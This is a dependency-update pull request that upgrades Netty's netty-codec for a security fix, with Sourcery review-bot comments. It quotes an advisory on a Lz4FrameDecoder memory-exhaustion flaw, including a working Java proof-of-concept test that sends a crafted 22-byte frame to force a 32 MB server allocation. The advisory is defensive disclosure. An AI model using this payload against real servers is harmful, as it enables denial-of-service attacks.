fix(deps): update dependency io.netty:netty-codec to v4.1.133.final [security]

[magisk317]

This PR contains the following updates:

Package	Change	Age	Confidence
io.netty:netty-codec (source)	4.1.125.Final → 4.1.133.Final

---

Netty Lz4FrameDecoder is vulnerable to resource exhaustion

CVE-2026-42583 / GHSA-mj4r-2hfc-f8p6

More information

Details

Summary

Lz4FrameDecoder allocates a ByteBuf of size decompressedLength (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus compressedLength payload bytes - 22 bytes if compressedLength == 1 - to force that allocation.

Details

io.netty.handler.codec.compression.Lz4FrameDecoder#decode
Header fields are trusted for sizing. On the compressed path, after readableBytes >= compressedLength, the decoder does ctx.alloc().buffer(decompressedLength, decompressedLength) then decompresses.

PoC

The test below demonstrates how an attacker sending 22 bytes will force the server to allocate 32MB

    @​Test
    void test() throws Exception {
        EventLoopGroup workerGroup = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
        try {
            AtomicReference<Throwable> serverError = new AtomicReference<>();
            CountDownLatch latch = new CountDownLatch(1);

            ServerBootstrap server = new ServerBootstrap()
                    .group(workerGroup)
                    .channel(NioServerSocketChannel.class)
                    .childHandler(new ChannelInitializer<SocketChannel>() {
                        @&#8203;Override
                        protected void initChannel(SocketChannel ch) {
                            ch.pipeline()
                                    .addLast(new Lz4FrameDecoder())
                                    .addLast(new ChannelInboundHandlerAdapter() {
                                        @&#8203;Override
                                        public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
                                            if (cause instanceof DecoderException) {
                                                serverError.set(cause.getCause());
                                            } else {
                                                serverError.set(cause);
                                            }
                                            latch.countDown();
                                        }
                                    });
                        }
                    });

            ChannelFuture serverChannel = server.bind(0).sync();

            Bootstrap client = new Bootstrap()
                    .group(workerGroup)
                    .channel(NioSocketChannel.class)
                    .handler(new ChannelInboundHandlerAdapter() {
                        @&#8203;Override
                        public void channelActive(ChannelHandlerContext ctx) {
                            ByteBuf buf = ctx.alloc().buffer(22, 22);
                            buf.writeLong(MAGIC_NUMBER);
                            buf.writeByte(BLOCK_TYPE_COMPRESSED | 0x0F);
                            buf.writeIntLE(1);
                            buf.writeIntLE(1 << 25);
                            buf.writeIntLE(0);
                            buf.writeByte(0);

                            ctx.writeAndFlush(buf);

                            ctx.fireChannelActive();
                        }
                    });

            ChannelFuture clientChannel = client.connect(serverChannel.channel().localAddress()).sync();

            assertTrue(latch.await(10, TimeUnit.SECONDS));

            assertInstanceOf(IndexOutOfBoundsException.class, serverError.get());

            clientChannel.channel().close();
            serverChannel.channel().close();
        } finally {
            workerGroup.shutdownGracefully();
        }
    }

Impact

Untrusted senders without per-channel / aggregate limits can stress memory with many small requests.

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/netty/netty/security/advisories/GHSA-mj4r-2hfc-f8p6
• https://github.com/netty/netty

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Mend Renovate.

[sourcery-ai]

Reviewer's guide (collapsed on small PRs)

审阅者指南

更新 Gradle 构建，使整个项目强制使用 io.netty:netty-codec 4.1.133.Final，以解决安全漏洞，同时保持其他 Netty 模块现有的固定版本不变。

文件级变更

Change	Details	Files
在 Gradle 的 resolution strategies 中将强制的 io.netty:netty-codec 版本提升到 4.1.133.Final，以获取安全修复。	将顶层 buildscript 中的 resolutionStrategy 更新为强制使用 io.netty:netty-codec:4.1.133.Final，而不是 4.1.125.Final。 将子项目配置的 resolutionStrategy 更新为强制使用 io.netty:netty-codec:4.1.133.Final，而不是 4.1.125.Final。 保持其他被强制的 Netty 构件（netty-codec-http、netty-codec-http2、netty-common 等）不变，以维持现有的兼容性矩阵。	build.gradle.kts

---

Tips and commands

与 Sourcery 交互

• 触发新的审阅： 在 pull request 中评论 @sourcery-ai review。
• 继续讨论： 直接回复 Sourcery 的审阅评论。
• 从审阅评论生成 GitHub issue： 通过回复某条审阅评论，请求 Sourcery 根据该评论创建一个 issue。你也可以在审阅评论下回复 @sourcery-ai issue 来从该评论创建 issue。
• 生成 pull request 标题： 在 pull request 标题的任意位置写入 @sourcery-ai，即可随时生成标题。你也可以在 pull request 中评论 @sourcery-ai title 来（重新）生成标题。
• 生成 pull request 摘要： 在 pull request 描述正文的任意位置写入 @sourcery-ai summary，即可在你想要的位置随时生成 PR 摘要。你也可以在 pull request 中评论 @sourcery-ai summary 来（重新）生成摘要。
• 生成审阅者指南： 在 pull request 中评论 @sourcery-ai guide，即可在任意时间（重新）生成审阅者指南。
• 解决所有 Sourcery 评论： 在 pull request 中评论 @sourcery-ai resolve，即可标记解决所有 Sourcery 评论。如果你已经处理完所有评论且不想再看到它们，这会非常有用。
• 撤销所有 Sourcery 审阅： 在 pull request 中评论 @sourcery-ai dismiss，即可撤销所有现有的 Sourcery 审阅。尤其适用于你想从头开始新的审阅时——别忘了再次评论 @sourcery-ai review 来触发新的审阅！

自定义你的体验

访问你的 dashboard 来：

• 启用或禁用诸如 Sourcery 生成的 pull request 摘要、审阅者指南等审阅功能。
• 更改审阅语言。
• 添加、移除或编辑自定义审阅指令。
• 调整其他审阅设置。

获取帮助

• 如有问题或反馈，请联系支持团队。
• 访问我们的文档获取详细指南和信息。
• 通过关注我们的 X/Twitter、LinkedIn 或 GitHub 与 Sourcery 团队保持联系。

Original review guide in English

Reviewer's guide (collapsed on small PRs)

Reviewer's Guide

Updates the Gradle build to force io.netty:netty-codec 4.1.133.Final across the project to address a security vulnerability while keeping other Netty modules at their existing pinned versions.

File-Level Changes

Change	Details	Files
Bump forced io.netty:netty-codec version to 4.1.133.Final in Gradle resolution strategies to pick up the security fix.	Update the top-level buildscript resolutionStrategy to force io.netty:netty-codec:4.1.133.Final instead of 4.1.125.Final. Update subprojects’ configurations resolutionStrategy to force io.netty:netty-codec:4.1.133.Final instead of 4.1.125.Final. Leave other forced Netty artifacts (netty-codec-http, netty-codec-http2, netty-common, etc.) unchanged to preserve the existing compatibility matrix.	build.gradle.kts

---

Tips and commands

Interacting with Sourcery

• Trigger a new review: Comment @sourcery-ai review on the pull request.
• Continue discussions: Reply directly to Sourcery's review comments.
• Generate a GitHub issue from a review comment: Ask Sourcery to create an
  issue from a review comment by replying to it. You can also reply to a
  review comment with @sourcery-ai issue to create an issue from it.
• Generate a pull request title: Write @sourcery-ai anywhere in the pull
  request title to generate a title at any time. You can also comment
  @sourcery-ai title on the pull request to (re-)generate the title at any time.
• Generate a pull request summary: Write @sourcery-ai summary anywhere in
  the pull request body to generate a PR summary at any time exactly where you
  want it. You can also comment @sourcery-ai summary on the pull request to
  (re-)generate the summary at any time.
• Generate reviewer's guide: Comment @sourcery-ai guide on the pull
  request to (re-)generate the reviewer's guide at any time.
• Resolve all Sourcery comments: Comment @sourcery-ai resolve on the
  pull request to resolve all Sourcery comments. Useful if you've already
  addressed all the comments and don't want to see them anymore.
• Dismiss all Sourcery reviews: Comment @sourcery-ai dismiss on the pull
  request to dismiss all existing Sourcery reviews. Especially useful if you
  want to start fresh with a new review - don't forget to comment
  @sourcery-ai review to trigger a new review!

Customizing Your Experience

Access your dashboard to:

• Enable or disable review features such as the Sourcery-generated pull request
  summary, the reviewer's guide, and others.
• Change the review language.
• Add, remove or edit custom review instructions.
• Adjust other review settings.

Getting Help

• Contact our support team for questions or feedback.
• Visit our documentation for detailed guides and information.
• Keep in touch with the Sourcery team by following us on X/Twitter, LinkedIn or GitHub.

[sourcery-ai]

嗨——我已经审查了你的修改，看起来非常棒！

---

Sourcery 对开源项目是免费的——如果你喜欢我们的代码审查，请考虑帮忙分享 ✨

• X
• Mastodon
• LinkedIn
• Facebook

_{帮我变得更有用！请在每条评论上点击 👍 或 👎，我会根据你的反馈来改进后续的代码审查。}

Original comment in English

Hey - I've reviewed your changes and they look great!

---

Sourcery is free for open source - if you like our reviews please consider sharing them ✨

• X
• Mastodon
• LinkedIn
• Facebook

_{Help me be more useful! Please click 👍 or 👎 on each comment and I'll use the feedback to improve your reviews.}